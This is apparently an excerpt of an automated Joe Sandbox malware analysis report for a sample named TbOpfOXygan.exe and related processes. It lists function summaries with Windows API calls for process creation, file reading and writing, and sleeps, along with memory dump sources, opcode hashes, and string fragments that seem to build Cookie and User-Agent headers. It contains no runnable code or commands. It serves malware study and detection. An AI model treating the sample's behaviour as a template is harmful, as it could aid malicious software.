Instruction Fuzzy Hash: 0B1121728045189EEF12AF64CC85AEFB7FCFF50306F0144A9E985EA115DE345A80CF96

Function 001D328F Relevance: 7.6, APIs: 5, Instructions: 61processstringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(00000000,00000000), ref: 001D32E6
GetStartupInfoA.KERNEL32(00000000), ref: 001D3330
CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,001D32B1,00000011,?,00000000,00A00000), ref: 001D335D
CloseHandle.KERNEL32(?,?,001D32B1,00000011,?,00000000,00A00000,00A00000,001D316A,00000004,00000000), ref: 001D3369
CloseHandle.KERNEL32(?,?,001D32B1,00000011,?,00000000,00A00000,00A00000,001D316A,00000004,00000000), ref: 001D3375

Memory Dump Source

Source File: 00000022.00000002.2502411154.00000000001D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_1d0000_bin.jbxd

Similarity

API ID: CloseHandle$CreateInfoProcessStartuplstrcat
String ID:
API String ID: 3387338972-0
Opcode ID: 6534d153614cf5f02f6a90d31dd8655b2dd373af8b70ed910efc85cfcc959576
Instruction ID: 4898629ae1575c2a6c00cfedea2a643d153d5f3e0f2924a97351e763eb4c9dbe
Opcode Fuzzy Hash: 6534d153614cf5f02f6a90d31dd8655b2dd373af8b70ed910efc85cfcc959576
Instruction Fuzzy Hash: 5F1121B2804518AEEF136B60CD85FAFB7F8EF50305F0544AAE995E6105DB345A80CF92

Function 008B26F1 Relevance: 6.0, APIs: 4, Instructions: 40fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000003,00000005,?,00000000), ref: 008B270C
GetFileSize.KERNEL32(?,00000000), ref: 008B2725
ReadFile.KERNEL32(?,?,FFFFFFFF,?,00000000), ref: 008B2746
CloseHandle.KERNEL32(?), ref: 008B2757

Memory Dump Source

Source File: 00000022.00000002.2503630840.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_8b0000_bin.jbxd

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: f05718e99d369eac40e2690169d296b8b40b30d56a66f1f0090856645f6f71ca
Instruction ID: 4415cd313af6573c5803c68abb41c848deb20e42dd3b7ace96c82c84d21ec496
Opcode Fuzzy Hash: f05718e99d369eac40e2690169d296b8b40b30d56a66f1f0090856645f6f71ca
Instruction Fuzzy Hash: BD01E830640209FBEF159F64CC46B9DBAB8FF00B44F2041A8AA14F91E0DB70AA259A58

Function 001D26CD Relevance: 6.0, APIs: 4, Instructions: 40fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000003,00000005,?,00000000), ref: 001D26E8
GetFileSize.KERNEL32(?,00000000), ref: 001D2701
ReadFile.KERNEL32(?,?,FFFFFFFF,?,00000000), ref: 001D2722
CloseHandle.KERNEL32(?), ref: 001D2733

Memory Dump Source

Source File: 00000022.00000002.2502411154.00000000001D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_1d0000_bin.jbxd

Similarity

API ID: File$CloseCreateHandleReadSize
String ID:
API String ID: 3919263394-0
Opcode ID: f05718e99d369eac40e2690169d296b8b40b30d56a66f1f0090856645f6f71ca
Instruction ID: 22bbcec27c61fcb70d23e7d303d7652f54cfda03ac3870a1a4cd7cb4abfbd8c7
Opcode Fuzzy Hash: f05718e99d369eac40e2690169d296b8b40b30d56a66f1f0090856645f6f71ca
Instruction Fuzzy Hash: DA01FF30640209FFEF219F60CC46F9D7AB4EF20B44F1041A9FA24FD1E0D770AA619A18

Function 008B2764 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00100000,40000000,00000003,00000000,?,00000080,00000000,00100000), ref: 008B2780
SetFilePointer.KERNEL32(00000002,00000000,00000000,00000002), ref: 008B279D
WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 008B27B9
CloseHandle.KERNEL32(?), ref: 008B27CA

Memory Dump Source

Source File: 00000022.00000002.2503630840.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_8b0000_bin.jbxd

Similarity

API ID: File$CloseCreateHandlePointerWrite
String ID:
API String ID: 3604237281-0
Opcode ID: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
Instruction ID: 3cb71162d1e0526bb7dc00376cea817333ef4789e191d4f88406bf12076e32d3
Opcode Fuzzy Hash: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
Instruction Fuzzy Hash: DC01E830640209BFEF119FA0CC45B9D7AB4FF04B04F1041A8BA54F91E1DB70AA609B58

Function 001D2740 Relevance: 6.0, APIs: 4, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00100000,40000000,00000003,00000000,?,00000080,00000000,00100000), ref: 001D275C
SetFilePointer.KERNEL32(00000002,00000000,00000000,00000002), ref: 001D2779
WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 001D2795
CloseHandle.KERNEL32(?), ref: 001D27A6

Memory Dump Source

Source File: 00000022.00000002.2502411154.00000000001D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 001D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_1d0000_bin.jbxd

Similarity

API ID: File$CloseCreateHandlePointerWrite
String ID:
API String ID: 3604237281-0
Opcode ID: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
Instruction ID: d1ccf6eb2e197ffd407da2cf2dcbfe60f97cb7de1ec77d81d8a1953d9b4a7ab3
Opcode Fuzzy Hash: a40e3678fe326f262f8e987c9c58990722f01f7e7693261b160253958e830727
Instruction Fuzzy Hash: CC01F630640209BFEF219FA0DC45F8E7EB5BF14B14F2041A9FA14BD1E5D771AA20AB54

Function 008B4002 Relevance: 6.0, APIs: 4, Instructions: 26sleepCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,?,008B3FF8,0000000A,?,00000000,0000000A), ref: 008B4022
Sleep.KERNEL32(000003E8,00000000,?,008B3FF8,0000000A,?,00000000,0000000A), ref: 008B4044
Sleep.KERNEL32(000007D0), ref: 008B4054
Sleep.KERNEL32(00000BB8), ref: 008B4064

Memory Dump Source

Source File: 00000022.00000002.2503630840.00000000008B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_34_2_8b0000_bin.jbxd

Similarity

API ID: Sleep$HandleModule
String ID:
API String ID: 3646095425-0
Opcode ID: 2260b28b3e21410e304e733389a9bb5d28d906a68a869efffc2975d072b34b11
Instruction ID: 2a8e48ff86266592664ea9304e6b2ed0443d8bdbd670ca7a70a24d3d99257ae1
Opcode Fuzzy Hash: 2260b28b3e21410e304e733389a9bb5d28d906a68a869efffc2975d072b34b11
Instruction Fuzzy Hash: 68F05870444640DAEB907FB8888B7983AA8FF10305F001090BB4AEE697CF7041808E77

Analysis Process: TbOpfOXygan.exePID: 4616, Parent PID: 616COMMON

Executed Functions

Function 0214097F Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000023.00000002.3364155195.0000000002140000.00000040.00000001.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_2140000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
Instruction ID: c7c993d1c5668a210b8ff73b5b5b6419dd4ffa9bbc27daaa090734784bb80bb0
Opcode Fuzzy Hash: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
Instruction Fuzzy Hash: 1A416E71680218AFEB269F60CC85FA973ACEF44744F1401A5BB49FE0D5DB70A690CE69

Function 02141386 Relevance: .1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000023.00000002.3364155195.0000000002140000.00000040.00000001.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_2140000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
Instruction ID: 93b9765c5316faf66b292318dc333d7b0adcafc065bd61f928e3e4fbfe6d0242
Opcode Fuzzy Hash: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
Instruction Fuzzy Hash: 40219D71A4021AAFDB11DF78C848B9DBBB5AF04714F498225F959BF2D0EB70E811CB94

Function 02141528 Relevance: .1, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000023.00000002.3364155195.0000000002140000.00000040.00000001.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_2140000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a0e7f0d646b88fd6e9b71376c3a42f9967952cb2f02f24ce030c4017fa39755
Instruction ID: e65ade6c102ae6075eef00eb2b9b101081450e0f56294fc1d504775b0ed55cb0
Opcode Fuzzy Hash: 0a0e7f0d646b88fd6e9b71376c3a42f9967952cb2f02f24ce030c4017fa39755
Instruction Fuzzy Hash: 4D117D72404514AEDF03AF60C5C4CAA73EDAF40718B45096A9D8DEE449EF749194CEE5

Function 021409A8 Relevance: .0, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000023.00000002.3364155195.0000000002140000.00000040.00000001.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_2140000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
Instruction ID: eceb741a300765d93ad57afd17393b7056e720060e8ea9c703c96a8cc2c074f3
Opcode Fuzzy Hash: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
Instruction Fuzzy Hash: EA014471644318AFEB22DE50CC81FAA73FCEF44B04F500195BB49EE0C5EAB065808AD9

Function 02143FDE Relevance: .0, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000023.00000002.3364155195.0000000002140000.00000040.00000001.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_2140000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
Instruction ID: d2508506a3db3d0b0c18c91c355d6a00c47bf7d728c49fa506ae27a218957f68
Opcode Fuzzy Hash: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
Instruction Fuzzy Hash: D2F039705C8280EFFB507BB08C89B8D36A99F01709F0400A0EA4EBF495CF78A4608E72

Non-executed Functions

Function 021447F7 Relevance: 6.4, Strings: 5, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ie: , xrefs: 021448B1
Cook, xrefs: 021448AB
-Age, xrefs: 02144933
nt: , xrefs: 02144939
User, xrefs: 0214492D

Memory Dump Source

Source File: 00000023.00000002.3364155195.0000000002140000.00000040.00000001.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_2140000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID: -Age$Cook$User$ie: $nt:
API String ID: 0-2052191038
Opcode ID: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
Instruction ID: adabfec2d64ebd25c9d5dc5d14b8915bc2a4d16170666a7d849a224e19db2130
Opcode Fuzzy Hash: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
Instruction Fuzzy Hash: 514197B2600208BFEF129F64CC44BDEBBB9FF84744F154069EA48AB154DB709650DF94

Function 021447F8 Relevance: 6.4, Strings: 5, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

ie: , xrefs: 021448B1
Cook, xrefs: 021448AB
-Age, xrefs: 02144933
nt: , xrefs: 02144939
User, xrefs: 0214492D

Memory Dump Source

Source File: 00000023.00000002.3364155195.0000000002140000.00000040.00000001.00020000.00000000.sdmp, Offset: 02140000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_35_2_2140000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID: -Age$Cook$User$ie: $nt:
API String ID: 0-2052191038
Opcode ID: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
Instruction ID: cd0353496c0f2450ad69fd81f348745bb0e3df0aadd2fd28c0a9f6ec12291bb7
Opcode Fuzzy Hash: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
Instruction Fuzzy Hash: 304173B2600208BFEF129F64CC48BDEBBB9FF84744F154069EA48AB154DB709650DF94

Analysis Process: TbOpfOXygan.exePID: 6524, Parent PID: 616COMMON

Executed Functions

Function 0073097F Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000024.00000002.3357178888.0000000000730000.00000040.00000001.00020000.00000000.sdmp, Offset: 00730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_730000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
Instruction ID: 6728ae20252ac2ffc0d6d814f5434eda735160c7bbe769ca22c6a962560125ae
Opcode Fuzzy Hash: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
Instruction Fuzzy Hash: 3C413071640258AFFB229F60CC85FA977ACEF44744F040195BA49FE0D6DB709A90CBA5

Function 00731386 Relevance: .1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000024.00000002.3357178888.0000000000730000.00000040.00000001.00020000.00000000.sdmp, Offset: 00730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_730000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
Instruction ID: cf8747c9e175c82e3595506a3fc25339bd8b5495f2739ec13f08a5264b2285e3
Opcode Fuzzy Hash: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
Instruction Fuzzy Hash: 57219D31A04256AFEB12DF78C849B9DBBB5AF04710F458325F955AF2D2E770A810CB94

Function 00731528 Relevance: .1, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000024.00000002.3357178888.0000000000730000.00000040.00000001.00020000.00000000.sdmp, Offset: 00730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_730000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0864a1ffd4af814af69d585a361cf04dd1537266d27de3667db18be38832b11
Instruction ID: b3ab5c32b568e308afb12959dcd869da6819acf2cfa87e916cd5dd211453e5fc
Opcode Fuzzy Hash: e0864a1ffd4af814af69d585a361cf04dd1537266d27de3667db18be38832b11
Instruction Fuzzy Hash: F2115CB2404514EEEF03AF60D5C9CAA73ECEE40704F450A6AAD89EF44AEF749154CAE5

Function 007309A8 Relevance: .0, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000024.00000002.3357178888.0000000000730000.00000040.00000001.00020000.00000000.sdmp, Offset: 00730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_730000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
Instruction ID: 614c5b5ccd998a654a4c780d553a4103c60e12a18bc5a98ee2d52576ce57b3c8
Opcode Fuzzy Hash: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
Instruction Fuzzy Hash: 21014471644318AFEB12DE50CC86FAA73FCEF44B04F500195BB49EE0C6EAB065808AD9

Function 00733FDE Relevance: .0, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000024.00000002.3357178888.0000000000730000.00000040.00000001.00020000.00000000.sdmp, Offset: 00730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_730000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6894170d7038a3f9f967b47c80f72c41a6d0015feba2888870859869def464f
Instruction ID: b1b935ce2fafb03b58fa4389c324c2747015a627abd8f3e759ef64808e641e6c
Opcode Fuzzy Hash: b6894170d7038a3f9f967b47c80f72c41a6d0015feba2888870859869def464f
Instruction Fuzzy Hash: 7BF01C706482A0D6FB687BA08C8EB4D36A89F01709F0400D1BB49AE597CE7C65509E72

Non-executed Functions

Function 007347F7 Relevance: 6.4, Strings: 5, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

User, xrefs: 0073492D
Cook, xrefs: 007348AB
-Age, xrefs: 00734933
ie: , xrefs: 007348B1
nt: , xrefs: 00734939

Memory Dump Source

Source File: 00000024.00000002.3357178888.0000000000730000.00000040.00000001.00020000.00000000.sdmp, Offset: 00730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_730000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID: -Age$Cook$User$ie: $nt:
API String ID: 0-2052191038
Opcode ID: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
Instruction ID: 7e55dad708bbd16c49a3e5a30327107e0ffe9593964e7d266f069c1e140af78a
Opcode Fuzzy Hash: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
Instruction Fuzzy Hash: 7B4186B2600208BFFF129F64CC48BDEBBB9FF84744F154059EA44AB155DB74AA50CB94

Function 007347F8 Relevance: 6.4, Strings: 5, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

User, xrefs: 0073492D
Cook, xrefs: 007348AB
-Age, xrefs: 00734933
ie: , xrefs: 007348B1
nt: , xrefs: 00734939

Memory Dump Source

Source File: 00000024.00000002.3357178888.0000000000730000.00000040.00000001.00020000.00000000.sdmp, Offset: 00730000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_36_2_730000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID: -Age$Cook$User$ie: $nt:
API String ID: 0-2052191038
Opcode ID: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
Instruction ID: b6663230ded7339e09aeeb9839e7960aa7e2bb3dd6665906f0b4b873e5046d2d
Opcode Fuzzy Hash: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
Instruction Fuzzy Hash: BC4174B2600208BFFF129F64CC48BDEBBB9FF84744F154059EA44AB255DB74AA50CB94

Analysis Process: TbOpfOXygan.exePID: 5720, Parent PID: 616COMMON

Executed Functions

Function 00B1097F Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000025.00000002.3360211551.0000000000B10000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_b10000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
Instruction ID: 11400e8cc1f12aa549bf9633ea7376086a2350317d109eab637b56ed2955b1aa
Opcode Fuzzy Hash: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
Instruction Fuzzy Hash: 88416371544214AFEB12AF60CC85FAA73FCEF44744F4401D5BA49FE0D6DAB0AAD0CA65

Function 00B11386 Relevance: .1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000025.00000002.3360211551.0000000000B10000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_b10000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
Instruction ID: 0e9a6d9ce4918557d1b7b7339c189ed6dcdef0c9ddec74412b3624f778cb9024
Opcode Fuzzy Hash: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
Instruction Fuzzy Hash: 2E21CD31900226AFDB11DF78C848B9CBBF5AF04710F458265FA64AF2D0E770A910CB94

Function 00B11528 Relevance: .1, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000025.00000002.3360211551.0000000000B10000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_b10000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1482415ca05b5c8e1457f3df7d068783956965e22d146909a8465ff1723fab8c
Instruction ID: 4ec691ced5890e4daf8895eb722ad0c1176e2868efd7ccd0add5ec4f8af0e36c
Opcode Fuzzy Hash: 1482415ca05b5c8e1457f3df7d068783956965e22d146909a8465ff1723fab8c
Instruction Fuzzy Hash: 1711C1B2404514AEDF03BF20D5C4CEA73ECEE40704B450AAAAD95EF44EEF709194CAE9

Function 00B109A8 Relevance: .0, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000025.00000002.3360211551.0000000000B10000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_b10000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
Instruction ID: 352594f392fedd469c8614d5a9ed25ab75da584b5a63bd9943c1a773f022acbb
Opcode Fuzzy Hash: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
Instruction Fuzzy Hash: B601F471644318AFEB12DE50CC86FAA73FCEF54B04F500595BB49EE0C5EAB06584CAD9

Function 00B13FDE Relevance: .0, Instructions: 26
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000025.00000002.3360211551.0000000000B10000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_b10000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
Instruction ID: dc6b8c3d51021caca117eafab4c4dda3fab1dff4ebd9c551559c9057c77a4bbf
Opcode Fuzzy Hash: 36476293484b907569b970ce3498e9f116e42be6cd6cdab6510587e434236c7b
Instruction Fuzzy Hash: 38F01C70548280D6EB507BB18C8EBCD36E89F05709F8804D0BB4ABE496CF7845D09E72

Non-executed Functions

Function 00B147F7 Relevance: 6.4, Strings: 5, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Cook, xrefs: 00B148AB
-Age, xrefs: 00B14933
nt: , xrefs: 00B14939
ie: , xrefs: 00B148B1
User, xrefs: 00B1492D

Memory Dump Source

Source File: 00000025.00000002.3360211551.0000000000B10000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_b10000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID: -Age$Cook$User$ie: $nt:
API String ID: 0-2052191038
Opcode ID: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
Instruction ID: f955f5db41eb90c3e4f90717f6cc859c747c3fbfeaeccf2e51149c4120cf9a6b
Opcode Fuzzy Hash: dc18ec15c2e940d25adf1e0b1d2258e227dd0017e21f71b5a18cb6415d93a5f5
Instruction Fuzzy Hash: D44186B2600208BFEF129F64CC44BDEBBF9FF84744F154099EA44AB154DB709A90CB94

Function 00B147F8 Relevance: 6.4, Strings: 5, Instructions: 128
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Cook, xrefs: 00B148AB
-Age, xrefs: 00B14933
nt: , xrefs: 00B14939
ie: , xrefs: 00B148B1
User, xrefs: 00B1492D

Memory Dump Source

Source File: 00000025.00000002.3360211551.0000000000B10000.00000040.00000001.00020000.00000000.sdmp, Offset: 00B10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_37_2_b10000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID: -Age$Cook$User$ie: $nt:
API String ID: 0-2052191038
Opcode ID: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
Instruction ID: 1df51df52038f82e0c92cfb7e0a6ecaca71ee7056ea8779aca579818ef17aaf9
Opcode Fuzzy Hash: 284eb8f5c2baf267a032a385f9555f6bebca5f37a1d302da12dfb653929c9741
Instruction Fuzzy Hash: 534183B2600208BFEF129F64CC48BDEBBF9FF84744F554098EA44AB154DB709A90CB94

Analysis Process: TbOpfOXygan.exePID: 3200, Parent PID: 616COMMON

Executed Functions

Function 0268097F Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000026.00000002.3362395547.0000000002680000.00000040.00000001.00020000.00000000.sdmp, Offset: 02680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_2680000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
Instruction ID: 72dc720698b2794f63435ebb207db0363640884a6835be0fff738a30095c3abe
Opcode Fuzzy Hash: ad64e37249b3624f62baf6f94603e73621808e2d749ca5dcf4f9d3e612046426
Instruction Fuzzy Hash: 7C418171640254AFEF12AF60CC85FA973BCEF04B04F040695BA49FE1D5DBB09694CE65

Function 02681386 Relevance: .1, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000026.00000002.3362395547.0000000002680000.00000040.00000001.00020000.00000000.sdmp, Offset: 02680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_2680000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
Instruction ID: dd0d93ff733648c15ec1a33c597e6b15f695fd31b448c3f0cf58c9779e4c7fd8
Opcode Fuzzy Hash: 9d7064604fc9afbce912f75c83d1ab5d78d8ab2bb2ae26d6a2305538c59cd48f
Instruction Fuzzy Hash: 24219D31900216AFDB11EF78C848B9DBBB5AF05714F058365F999BF2D0E770A812CB94

Function 02681528 Relevance: .1, Instructions: 51
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000026.00000002.3362395547.0000000002680000.00000040.00000001.00020000.00000000.sdmp, Offset: 02680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_2680000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0864a1ffd4af814af69d585a361cf04dd1537266d27de3667db18be38832b11
Instruction ID: e1508274446c273e533c2ca1ad09a3403c06f89b4de30b9662cd44269c8dc17c
Opcode Fuzzy Hash: e0864a1ffd4af814af69d585a361cf04dd1537266d27de3667db18be38832b11
Instruction Fuzzy Hash: FD11AD724045149FDF03BF20D5C48AA73EDAF41704B450AAA9D89EE449EF709254CEE9

Function 026809A8 Relevance: .0, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000026.00000002.3362395547.0000000002680000.00000040.00000001.00020000.00000000.sdmp, Offset: 02680000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_2680000_TbOpfOXygan.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fe8f920145a3f76a1aee589c902fd94702d5a0faa41a89d88954ce8d066c302
Instruction ID: a676d2061a0bf99d860f967df782a7b8129a9f2224ddc859ce9e595b66f4a122
